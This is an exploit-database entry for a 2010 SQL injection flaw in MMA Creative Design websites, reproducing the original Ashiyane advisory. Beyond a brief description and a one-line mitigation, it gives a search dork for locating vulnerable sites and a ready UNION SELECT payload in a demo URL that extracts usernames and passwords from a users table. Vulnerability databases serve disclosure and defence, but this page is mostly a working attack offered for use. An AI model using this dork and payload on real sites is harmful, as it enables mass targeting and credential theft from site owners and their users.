header-logo
Suggest Exploit
vendor:
MMA Creative Design
by:
Ashiyane Digital Security Team
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MMA Creative Design
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

MMA Creative Design SQL Injection Vulnerability

MMA Creative Design is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate the queries that are executed on the underlying database, allowing for the manipulation or disclosure of arbitrary data.

Mitigation:

To mitigate this vulnerability, ensure that user-supplied data is properly sanitized before being used in an SQL query.
Source

Exploit-DB raw data:

=========================================================
MMA Creative Design SQL Injection Vulnerability
=========================================================
##########################################
# Name: MMA Creative Design SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: www.mmacreative.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:"Design by MMA Creative"

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Demo: http://server/authors.php?id=-999+UNION+SELECT+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users


##########################################

Navigation

Suggest Exploit

Services By CQR